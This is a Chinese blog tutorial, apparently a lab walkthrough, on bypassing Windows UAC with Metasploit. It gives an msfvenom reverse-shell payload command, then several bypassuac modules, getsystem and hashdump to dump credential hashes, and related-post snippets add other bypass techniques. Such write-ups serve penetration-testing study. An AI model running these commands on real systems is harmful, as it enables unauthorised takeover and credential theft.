Windows提权之绕过uac bypassuac提权(十)

最新推荐文章于 2025-05-25 00:03:40 发布
最新推荐文章于 2025-05-25 00:03:40 发布
阅读量723 收藏 7
点赞数 7
CC 4.0 BY-SA版权
分类专栏: Windows提权完整版 文章标签: windows 网络 测试工具 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2303_78851087/article/details/145948823
1.描述

UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。

为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运行 执行文件)

2.复现

bypassuac模块绕过uac

使用msf搜索 uac模块

首先 我们需要先拿到win10的webshell

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.25.138 lport=8888 -f exe > 9.exe

拿到了webshell

权限不够

这里也是我们的uac登录

我们退出

然后搜索

通常使用 bypassuac模块 一般是可以绕过的 但是也不排除失败的可能通过进程注入使可信任发布者证书绕过Windows UAC。

我们一般使用这个

我们输入

use exploit/windows/local/bypassuac

并且设置session

但是这里并没有成功

然后我们就尝试用另外一个

use exploit/windows/local/bypassuac_injection

此模块将利用受信任的通过进程注入发布者证书。它将产生一个关闭UAC标志的第二个shell。此模块使用反射DLL注入技术,仅丢弃DLL有效负载二进制文件,而不是标准技术中的三个单独的二进制文件。但是,它需要选择正确的体系结构x64(也适用于SYSWOW64系统)。如果指定EXE::自定义DLL应在单 独启动有效负载后调用ExitProcess()

发现这个也不行

我们就试试最后一个

use exploit/windows/local/bypassuac_injection_winsxs

我在这里迁移进程也失败了

经过博主的不懈努力 我终于赎出来了

use exploit/windows/local/bypassuac_sluihijack

这下输入 getsystem 可以输入了

我们输入 hashdump

获得hash值

操作系统()绕过UAC-MSF和CS绕过UAC
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-25 1629
该模块会创建一个可执行文件,目标机器会运行一个发起限请求的程序,示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system限的shell。这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可。使用该模块的使用,当前用户必须是管理员组中的用户,UAC为默认设置。拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC。执行添加用户的命令时显示拒绝访问。使用CS自带的插件进行绕过后可以完成添加用户的命令。生成一个MSF的SHELL。
Windows笔记-UAC绕过详解
墨痕诉清风的博客
03-12 632
用户帐户控制(UAC)是Microsoft在Windows Vista和Windows Server 2008中引入的访问控制系统。尽管UAC已经被讨论和调查了很长时间,但必须强调的是,微软并不认为它是一个安全边界。相反,UAC强制应用程序和任务在非管理帐户的上下文中运行,直到管理员授升的访问限。它将阻止安装程序和未经授的应用程序在没有管理帐户限的情况下运行,并阻止对系统设置的更改。通常,UAC的效果是,任何希望执行具有潜在系统范围影响的操作的应用程序都不能默默地执行。至少在理论上是这样。
Windows bypassUAC技法详解
最新发布
vortex5的博客
05-25 888
本文介绍了Windows系统中三种绕过UAC方法:(1)利用autoElevate白名单程序,通过修改注册表或执行自带工具实现升;(2)DLL劫持技术,利用程序加载DLL时的路径漏洞执行恶意代码;(3)SSPI接口绕过,通过身份验证协议触发特操作。这些方法揭示了Windows安全机制中的潜在漏洞,既可用于渗透测试发现系统弱点,也为防御者供了加固系统的参考方向。
BypassUAC-
weixin_45701675的博客
11-19 1359
什么是UAC?如何设置? UAC(UserAccount Control,用户账户控制) 简言之就是在Vista及更高版本中通过弹框进一步让用户 确认是否授当前可执行文件来达到阻止恶意程序的目的。 可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级) 参考:http://cn-sec.com/archives/116488.html #BypassUAC?常见绕过项目? 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC 绕过项目:M
Bypass UAC
LYSM
06-30 4113
背景 UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问限。UAC 可以阻止未经授的应用程序自动进行安装,并防止无意中更改系统设置。 UAC需要授的动作包括:配置Windows Update;增加或删除用户账户;改变用户的账户类型;改变UAC设置;安装ActiveX;安装或移除程序;安装设备驱动程序;设置家长控制;将文件移动或复制到
bypassuac
qq_46258964的博客
06-20 1517
UAC介绍 UAC是微软为高系统安全性中引入的技术。 UAC要求用户在执行可能影响计算机运行的操作或者在进行可能影响其他用户的设置之前, 拥有相应的限或者管理员密码。UAC在操作启动前对用户身份进行验证, 以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行修改。 微软设置的安全控制策略,分为高、中、低三个等级。 高等级的进程有管理员限;中等级的进程有普通管理员限;低等级的进程,限是有限的,以保证系统在受到安全威胁时造成的损害最小。uac绕过 为了远程执行目标的ex
bypassUAC
火柴人的博客
05-17 307
https://www.anquanke.com/post/id/163222 我有个bypassUAC想给你讲
通过Bypass UAC进行
渗透之路,攻防之间皆学问
01-30 6866
用户账户控制(User Account control,UAC)是windows系统采用的一种控制机制,可以阻止自动安装未经授的应用 并防止意外更改系统设置,有助于防止恶意软件损坏计算机。用户账户控制程序使应用程序和任务始终在非管理员账户的安全上下文中运行,除非管理员专门授管理员级别的限。开启用户账户控制后,每个需要使用管理员访问令牌的应用都必须征得用户同意。UAC限制所有用户包括非RID500的管理员用户使用标准用户登录到他们的计算机,并在标准用户的安全性上下文中访问资源和运行应用。
系统权之Windows
f_carey的博客
11-04 3114
郑重声明: 本笔记编写目的只用于安全知识升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 1 利用漏洞1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误2.1 系统服务限配置错误2.1.1 利用 Po.
bypassUAC
yangbz123的博客
06-07 1734
目录Windows UAC概述UAC结构图UAC组件描述UAC滑块设置UAC可授的控制漏洞UAC权之MSF1、bypassuac2、bypassuac_eventvwr3、RunAsUAC权之Empire1、bapassuac模块2、bapassuac_wscript模块UAC权之CSUAC权之powershell参考文献 Windows UAC概述 用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作
嘿咻Win7'UAC
blackbean的专栏
09-24 560
fireworm同学的翻译: 原文在http://www.pretentiousname.com/misc/win7_uac_whitelist2.html我只翻译了其中关于原理的一小部分,有兴趣的可以自己去看看。 Win7的UAC与Vista不同,鉴于前作糟糕的设计,为了减
bypassuac:绕过uac
05-13
bypassuac ###example: bypassuac.exe "/c echo 1 >> c:\\3333" bypassuac.exe "/c powershell -c "aaaa" bypassuac,exe system ###题外话: 只能编译成32位. 多重指针写起来太麻烦,所以patch peb用内嵌汇编写的. 想编译成x64的话得改改代码. 参考了老外的项目: patch peb后,然后调用IFileOperation对象的某个接口的shellexecute函数,原因在老外的文章里写了. 具体细节看代码吧. 适用于Win7-Win10 加了一段getsystem的代码,原理跟msf里的getsystem一样.
DccwBypassUACWindows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
02-06
DccwBypassUACWindows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
关于bypassUAC
qq_63217130的博客
01-23 755
原理:注册表中的一些程序,在运行时,由于被加入白名单了,这些程序要么本身具有管理员限,要么可以直接获取管理员限,那么可以点击运行后静默为管理员限,不需要弹出uac的窗口,那么攻击者可以通过修改注册表中的这些uac白名单的程序,将其换成一个恶意的程序那么即可管理员限运行绕过uac认证。关于DLL劫持还有一个需要注意的,当你劫持了一个DLL之后,那么原先的程序就不能正常运行了,甚至可能会损坏系统,为了防止这种事故发生,一般会在恶意的dll中去加载真正的dll,这样就不会影响程序的正常运行了。
bypass UAC
a439017985的博客
02-24 1949
在meterpreter下 getuid sysinfo 查看系统版本及相关信息(多少位) background search bypassuac   use exploit/windows/local/bypassuac_eventvwr   此exploit对win10 64位有效 injection的对win10 32位的有效,对64位的无效 set session ex
技术之Bypass UAC
weixin_42071117的博客
10-19 999
// UAC(用户账户控制)是微软在Windows VISTA以后版本中引入的一种安全机制。通过UAC,应用程序和任务始终在非管理员限下的安全上下文中运行。 // 除非特别授予管理员限。UAC可以阻止未经授的应用程序自动进行安装,并防止无意地更改系统设置。 // UAC需要授的动作包括:配置Windows Update、增加或删除用户账户、更改用户账户的类型、改变UAC设置、安装ActiveX、安装或移除程序、安装设备驱动程序、 // 设置家长控制、将文件移动或复制到Program File或Wi
BypassUAC方式总结
Kevin's Blog
11-09 5954
文章目录一、利用场景/需求1.1 UAC介绍1.2 目的绕过二、MSF之bypassuac模块2.1 bypassuac_eventvwr模块 一、利用场景/需求 1.1 UAC介绍 UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授当前可执行文件来达到阻止恶意程序的目的。 1.2 目的绕过 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运行执行文件) 具体的场景可
UAC bypass 理论学习
mengxp的博客
11-17 376
简单来说: 1.微软设计了一些有自功能的COM组件。最常见的是 IFileOperation,他能在某些白进程中,对系统关键目录(需要才能访问的目录),实现文件复制、重命名、删除。简单的利用办法是注入dll到explorer然后调用IFileOperation,或者篡改PEB,伪装成explorer。或者我觉得还可以实现的方法是hook psapi。 2.微软设计了一些有自功能的可执行文件,在manifest清单中打开autoElevate选项:<autoElevate>true
ByPass UAC
yeanhoo的博客
09-24 1327
ByPass UAC 白名单程序 Bypass UAC 有些系统程序是直接获取管理员限,而不触发UAC弹框的,这类程序称为白名单程序.例如, slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe等.这些 白名单程序可以通过DLL劫持、注入或是修改注册表执行命令的方式启动目标程序,实现Bypass UAC操作 利用CompMgmtLauncher.exe、该程序在启动时会查询注册
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值